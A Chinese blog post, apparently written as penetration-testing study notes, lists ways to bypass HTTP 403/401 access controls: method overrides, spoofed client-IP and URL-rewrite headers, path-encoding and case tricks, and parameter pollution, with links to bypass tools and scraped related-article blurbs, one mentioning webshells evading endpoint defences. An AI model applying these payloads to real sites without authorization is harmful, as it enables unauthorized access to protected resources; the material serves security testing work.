403&401Bypass绕过

最新推荐文章于 2025-02-26 23:14:53 发布
最新推荐文章于 2025-02-26 23:14:53 发布
阅读量848 收藏
点赞数 2
文章标签: 学习 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Caideyib/article/details/134310276
版权

403 & 401 Bypass

尝试使用不同的请求方法去请求

尝试发送不同类型的请求例如:GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK但是一般服务都会限制请求方法(万一呢)

  • 查看相应头,例如,对 HEAD 的 200 响应带有 Content-Length: 55 意味着 HEAD 动词可以访问该信息。但是仍需要别的方法去显示出这些信息

  • 使用动词覆盖:X-Method_Overridex-http-method-override

    例如:

    POST /api/Person/4 HTTP/1.1  
X-HTTP-Method-Override: PUT
尝试修改请求头

  • 修改Host值,如果网站做了基于域名或则和ip地址的访问控制策略限制一些敏感资源的访问,可以通过修改host值(比如通过信息收集到的子域,或者是目标的其他资产ip或者是内网 ip)都可以进行尝试从而绕过访问控制策略。

  • 修改UA,爆破尝试不同的UA

  • 尝试使用HTTP Proxy Headers,修改请求头中表示请求的客户端原始地址,同样将其改为子域,其他资产ip,localhost等等,如:

    X-Originating-IP: 127.0.0.1
    X-Forwarded-For: 127.0.0.1
    X-Forwarded: 127.0.0.1
    Forwarded-For: 127.0.0.1
    X-Remote-IP: 127.0.0.1
    X-Remote-Addr: 127.0.0.1
    X-ProxyUser-Ip: 127.0.0.1
    X-Original-URL: 127.0.0.1
    Client-IP: 127.0.0.1
    True-Client-IP: 127.0.0.1
    Cluster-Client-IP: 127.0.0.1
    X-ProxyUser-Ip: 127.0.0.1
    Host: localhost

    或者是修改为访问目标下的子目录,例如我想访问/admin目录但是没有权限可以尝试将请求头修改为

    X-Original-URL:/admin/xxxxx

    X-Rewrite-URL: /admin/xxxxx

  • 如果网页不是直接从原始服务器获取,而是通过代理服务器中转或代理传输的,代理服务器可以限制你访问私有信息,对一些敏感请求进行拦截。可以尝试通过HTTP请求走私或者是逐跳标头这里引用了一些大佬的博客,方便后续的学习。

    逐跳标头

    请求走私

  • 403也有可能是waf导致,waf中配置了禁止访问的文件名或者路径,此时可以尝试通过填充脏数据,大小写,双重URL编码或者fuzz路径来尝试bypass

    比如

    /./path_
#url 编码
/%2e/path_
#双重url编码
/%252e/path_
#或者是对 / 编码
//path
%2f/path
%252f/path
%ef%bc%8f/path
#大小写
abc.com/admin
abc.com/ADMIN
abc.com/admin/
abc.com/admin/.
abc.com/./admin//
abc.com/admin/..
abc.com/;/admin
abc.com/,;/admin
abc.com//;//admin
abc.com/admin.json 
#或者直接fuzz
/fuzzdicadmin
/fuzzdic/admin
/adminfuzzdic

  • 或者修改其他参数

    例如:

    /v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{"id":111} --> 401 Unauthriozied
{"id":[111]} --> 200
{"id":111} --> 401 Unauthriozied
{"id":{"id":111}} --> 200 (JSON参数污染)
user_id=ATTACKER_ID&user_id=VICTIM_ID (参数污染)

    或者:

    • 修改参数
    • id=1 -> id=2
    • 增加参数
    • ?id=123 -> ?id=123&isAdmin=true
    • 删除参数
    • 重新排列参数
    • 使用特殊字符
    • 在参数中执行边界测试
或者使用一些自动化工具
  • https://github.com/lobuhi/byp4xx
  • https://github.com/iamj0ker/bypass-403
  • https://github.com/gotr00t0day/forbiddenpass
  • https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122
  • https://github.com/Sn1r/Forbidden-Buster
z3al4u
关注
绕过HTTP401403响应限制工具
墨痕诉清风的博客
06-26 361
一种旨在自动化各种技术的工具,以绕过HTTP 401403响应代码并访问系统中未授权的区域。此代码是为安全爱好者和专业人士只。使用它在您自己的风险。
401403页面绕过技巧总结
墨痕诉清风的博客
07-18 2440
通过支持X-Original-URL和X-Rewrite-URL标头,用户可以使用X-Original-URL或X-Rewrite-URL HTTP请求标头覆盖请求URL中的路径,尝试绕过对更高级别的缓存和Web服务器的限制。一般开发者会通过Nginx代理识别访问端IP限制对接口的访问,尝试使用 X-Forwarded-For、X-Forwared-Host等标头绕过Web服务器的限制。Referer 请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。
渗透测试-渗透中403/401页面绕过的思路总结
lza20001103的博客
08-29 6059
渗透中403/401页面绕过的思路总结 文章目录渗透中403/401页面绕过的思路总结0x01 前言0x02 利用姿势1.端口利用2.修改HOST3.覆盖请求URL4.Referer标头绕过5.代理IP6.扩展名绕过7.扫描的时候8.最后补充再一些401403 bypass的tips 0x01 前言 做渗透时经常会碰到扫到的资产403的情况,特别是资产微乎其微的情况下,面试有时也会问到,这里做个总结! 0x02 利用姿势 1.端口利用 扫描主机端口,找其它开放web服务的端口,访问其端口,挑软柿子。 2
20个403 bypass技巧
最新发布
soc的博客
02-26 665
在Web渗透测试中,403 Forbidden状态码如同一位沉默的守卫,常常让安全人员陷入困境。这个状态码表明服务器已理解请求,但拒绝执行。本文将从底层协议原理出发,结合攻防对抗案例,系统梳理20种经过实战验证的绕过技巧,帮助安全从业者建立完整的403绕过知识体系。
403页面绕过
qq_63980959的博客
02-29 3450
拿到客户给的地址后,首先进行信息收集。端口信息收集,利用nmap进行全端口探测,发现除了80端口之外,还开放了一个web服务的8001端口,我们尝试使用8001端口访问(https://xxx.xxxx.com:8001),总是充满惊喜。可直接绕过IP限制进行访问。怕是这个运维要挨锤了,立马把这个问题,反馈给客户。https://iamadmixxx.xxx.xxx:8001/auth/login通过沟通,由于疏忽未下线8001端口,客户貌似认为这个很简单,关闭8001端口,下线业务后,让我们继续尝试后台能
BypassSuper:绕过403401或404
05-23
BypassSuper 一款针对403/401页面进行快速、高效尝试Bypass的扫描工具 ______ _____ | ___ \ / ___| | |_/ /_ _ _ __ __ _ ___ ___ \ `--. _ _ _ __ ___ _ __ | ___ \ | | | '_ \ / _` / __/ __| `--. \ | | | '_ \ / _ \ '__| | |_/ / |_| | |_) | (_| \__ \__ \/\__/ / |_| | |_) | __/ |
403 & 401 Bypasses
菜鸟学渗透
10-11 1716
在我们做渗透测试或者攻防演练的时候,绕过HTTP状态码401(未授权)和403(禁止访问)的目的是为了绕过访问控制或权限限制,从而获取本不应有的访问权限,继续深入测试目标系统的其他部分。
401/403绕过
qq_55202378的博客
08-22 560
一般开发者会通过Nginx代理识别访问端IP限制对接口的访问,尝试使用。服务端一般使用Referer请求头识别访问来源。请求头包含了当前请求页面的来源页面的地址,基于扩展名,用于绕过403受限制的目录。等标头绕过Web服务器的限制。标头绕过Web服务器的限制。
burp爆破401基础认证
课嗨教育的专栏
04-05 3021
目录 0x01 废话 0x02 基础认证介绍 0x03 burp爆破 0x01 废话 很多小伙伴不知道怎么使用burpsuite对基础认证进行报错,这次工作中遇到了,本来没有啥好写的,但是想想还是写下过程吧。 0x02 基础认证介绍 401错误代表用户没有访问权限,需要进行身份认证。比如tomcat的manager平台的登录验证就是401认证: 基础认证的数据包跟往常的POST和GET的包认证方式有那么一丢丢差距,他的请求包是像下面这样的格式: GET /manager/html H
bypass绕过
孤桜懶契
05-16 1600
本地搭建安全狗安装坑 系统服务启动的坑 管理员模式在apache目录执行 httpd.exe -k install -n apache2.0 如果要删除服务重新来,可以输下面这个,给你留着备用 D:phpStudyApachebin>httpd.exe -k install -n apache2.4 sc delete apache2.0 简介WAF WAF是一个缩写,全名web应用防护系统(Web Application Firewall),是通过执行一系列针对HTTP/HTTPS的安全策
4-ZERO-3:403401绕过方法+ Bash自动化+您的支持;)
03-04
介绍 4-ZERO-3工具绕过403/401。 该脚本包含执行此操作的所有可能技术。 注意:如果看到多个[200 Ok] /旁路作为输出,则必须检查Content-Length。 如果多次(200 OK)/旁路的内容长度相同,则表示误报。 原因可能是“ 301/302”或“ ../”。[有效负载]不要紧迫。 用法 root@me_dheeraj:$ bash 403-bypass.sh https://target.com/secret 先决条件 apt安装curl [Debian]
bypass-403:一个简单的脚本,仅供旁路403使用
04-13
在卷曲的帮助下使用13个已知的403绕过 安装 git clone https://github.com/iamj0ker/bypass-403 cd bypass-403 chmod +x bypass-403.sh sudo apt install figlet如果您无法看到屏幕截图中的徽标 贡献者
XSSBypass:XSS绕过技术
05-17
**XSS(跨站脚本攻击)Bypass:探索XSS绕过技术** XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本,进而执行非授权的操作。当Web应用程序未能充分地验证和转义...
.Net网站webshell 401403?D盾拦截?一招内存马直接搞定
qax
01-31 2674
在参加某次公司项目时,在碰到一个.NEt的通用系统,通过审计发现了两个文件上传漏洞,网站管理员发现网站被上传webshell后,最开始是修改了网站的配置文件,导致脚本文件禁止执行,后来通过上传web.config的方式给绕过了,但是后面管理员又给服务器装了D盾,安全狗,天擎,导致上传的文件无法正常解析,尝试了各种免杀的aspx马,都是提示禁止执行脚本文件,最后通过加载内存马的方式绕过了D盾的检测。
解密HTTP错误码401 Unauthorized:探索身份验证的奥秘
热门推荐
博客
08-15 1万+
HTTP身份验证是Web应用程序中常用的一种安全机制,用于验证用户的身份并控制对资源的访问。它通过在客户端和服务器之间传递身份验证凭证来完成身份验证过程。摘要身份验证是一种更安全的身份验证方法。它使用摘要算法对用户名、密码和其他参数进行加密,以确保身份验证凭证的安全性。HTTP错误码401 Unauthorized是一种常见的错误码,表示客户端请求未经身份验证或身份验证失败。
使用403Bypasser绕过HTTP 403错误:技术解析与应用指南
gitblog_00037的博客
04-25 1103
使用403Bypasser绕过HTTP 403错误:技术解析与应用指南 项目地址:https://gitcode.com/gh_mirrors/40/403bypasser 当你试图访问某个网页时,如果收到“HTTP 403 Forbidden”错误,这意味着服务器已经识别到你的请求,但拒绝提供服务。这可能是由于各种安全策略或版权保护措施引起的。然而,对于开发者和研究人员来说,这种限制可能阻碍了他...
HTTP报错401403详解及解决办法
ning6258的博客
02-18 2684
一、401: HTTP 401 错误 - 未授权: (Unauthorized) 您的Web服务器认为,客户端发送的 HTTP 数据流是正确的,但进入网址 (URL) 资源 , 需要用户身份验证 , 而相关信息 1 )尚未被提供, 或 2 )已提供但没有通过授权测试。这就是通常所知的“ HTTP 基本验证 ”。 需客户端提供的验证请求在 HTTP 协议中被定义为 WWW – 验证标头字段 (W...
【渗透实战】使用403bypasser绕过目标页面上的访问控制限制
kjuhfkicf154的博客
02-01 3309
403bypasser是一款自动化工具,该工具能够以自动化的形式实现针对目标页面的访问控制限制绕过技术。
BypassSuper工具:轻松绕过403/401/404安全限制
资源摘要信息:"BypassSuper是一款专为绕过网站常见的403401、404等HTTP状态码页面而设计的扫描工具。这些HTTP状态码通常表明客户端请求存在问题,例如无权限访问(401)、禁止访问(403)或请求的资源不存在(404...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值